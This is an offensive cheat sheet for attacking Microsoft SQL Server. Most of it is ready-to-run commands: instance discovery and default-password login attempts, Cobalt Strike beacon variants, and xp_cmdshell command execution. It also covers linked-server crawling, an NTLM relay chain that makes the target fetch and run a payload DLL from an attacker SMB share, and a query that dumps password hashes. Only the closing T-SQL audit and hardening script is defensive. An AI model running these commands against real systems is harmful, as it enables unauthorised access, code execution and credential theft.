
MSSQL

Connection

ESC - Interactive .NET client for MSSQL abuse

Connect to MSSQL using Windows authentication (Impacket)

mssqlclient.py <user>@<ip> -windows-auth

PowerUpSQL

Identify SQL instances

Authenticated user

Get-SQLInstanceDomain [| Get-SQLServerInfo]

Unauthenticated user

Get-SQLInstanceScanUDP

Check login access

Attempt to log in to every discovered instance with the current domain account, keep the accessible ones and save them to a CSV file for later use

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 | Where-Object {$_.Status -like "Accessible"} | Export-Csv -Path .\targets.csv

Attempt to log in with known default passwords of common applications

Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose

The same two checks run from a Cobalt Strike beacon via powerpick

powerpick Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose

powerpick Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 | Where-Object {$_.Status -like "Accessible"} | Export-Csv -Path .\targets.csv

Post-Exploitation on DB

Perform actions against a single instance, or against all targets saved in the CSV file

Import-Csv -Path .\targets.csv | Get-SQLServerInfo

Invoke-SQLAudit -Verbose -Instance "<INSTANCE>"

List databases, tables and columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

Search column names for given keywords and pull a sample of the matching data

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

RCE

Invoke-SQLOSCmd -Verbose -Instance <instance_fqdn> -Command "<command>"

Enumerate and crawl database links (commands on a linked server run with the credentials mapped to the link)

Get-SQLServerLink
Get-SQLServerLinkCrawl
Get-SQLQuery -Instance "<SERVER1>" -Query 'EXEC "<SERVER2>".master..xp_cmdshell "whoami /all"'

SMB relay via xp_dirtree

Prerequisites

  • Linux OS with network access to the targets
  • EXECUTE privilege on the xp_dirtree procedure with an authenticated account on the DB
  • The MSSQL service on <MSSQL_HOST> runs under an account that has admin rights on <TARGET_RELAY>

Step 1 - Create a virtual interface

ifconfig <IFACE>:0 <AVAILABLE_IP> netmask <NETMASK>

In the following steps, <IP1> is the IP of the physical interface <IFACE> (e.g. eth0) and <IP2> is <AVAILABLE_IP>, the IP of the alias <IFACE>:0 (e.g. eth0:0)

Step 2 - Configure MSF

use admin/mssql/mssql_ntlm_stealer

set RHOSTS <MSSQL_RHOST>
set RPORT <RPORT>

set SMBPROXY <IP1>

set USE_WINDOWS_AUTHENT true

Step 3 - Start ntlmrelayx

sudo impacket-ntlmrelayx -smb2support -t <TARGET_RELAY> -c 'rundll32.exe \\<IP2>\public\<PAYLOAD>.dll,Start' -ip <IP1>

Step 4 - Host the payload via SMB share

sudo impacket-smbserver -smb2support public . -ip <IP2>

Step 5 - Start the attack in MSF

run

Enable XP_CMDSHELL

Tip: type one line at a time.

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell '<cmd>'
go

Nmap

nmap -Pn -n --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="<cmd>"

SQLCMD (local instance, Windows authentication)

sqlcmd -E -S localhost -Q "EXEC sp_databases;"
sqlcmd -E -S localhost -Q "SELECT name, password_hash FROM master.sys.sql_logins;"
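Defender-side counterpart to the xp_cmdshell, xp_dirtree and link crawling sections above, added here and not part of the original cheat sheet: a T-SQL audit that reports the two sp_configure options the enable sequence toggles, the explicit EXECUTE grants on xp_cmdshell and xp_dirtree, and the linked servers with their mapped logins, then reverts xp_cmdshell to its default. It assumes it is run as a sysadmin member on the instance under review.

```sql
-- Added audit/hardening script; not part of the original cheat sheet.
-- Assumes a sysadmin session on the instance under review.
USE master;

-- 1. State of the two options the xp_cmdshell enable sequence toggles.
--    value_in_use = 1 for xp_cmdshell means OS command execution is live.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Explicit EXECUTE grants on xp_cmdshell and xp_dirtree in master.
--    xp_dirtree is executable by public out of the box, which is what the
--    SMB relay prerequisite relies on; xp_cmdshell is sysadmin-only unless
--    someone granted it, so any non-default row here needs an owner.
SELECT pr.name      AS grantee,
       pr.type_desc AS grantee_type,
       o.name       AS procedure_name,
       pe.state_desc,
       pe.permission_name
FROM sys.database_permissions AS pe
JOIN sys.objects             AS o  ON pe.major_id = o.object_id
JOIN sys.database_principals AS pr ON pe.grantee_principal_id = pr.principal_id
WHERE o.name IN ('xp_cmdshell', 'xp_dirtree');

-- 3. Linked servers and the logins they map, the path link crawling follows.
--    uses_self_credential = 0 with a remote_name set means a fixed remote
--    login is stored for every local principal the row applies to.
SELECT s.name, s.data_source, s.provider,
       ll.local_principal_id, ll.uses_self_credential, ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 4. Revert xp_cmdshell to its default (off) and hide advanced options again.
--    'show advanced options' must be on for the xp_cmdshell option to be settable.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Optional: remove the relay prerequisite by revoking xp_dirtree from
--    public. Check first that no tooling on this instance depends on it.
-- REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree FROM public;
```

Rows from query 2 and linked servers from query 3 are the items to review with the database owners; a SQL Server Audit on EXECUTE of xp_cmdshell and xp_dirtree gives ongoing visibility once the baseline is known.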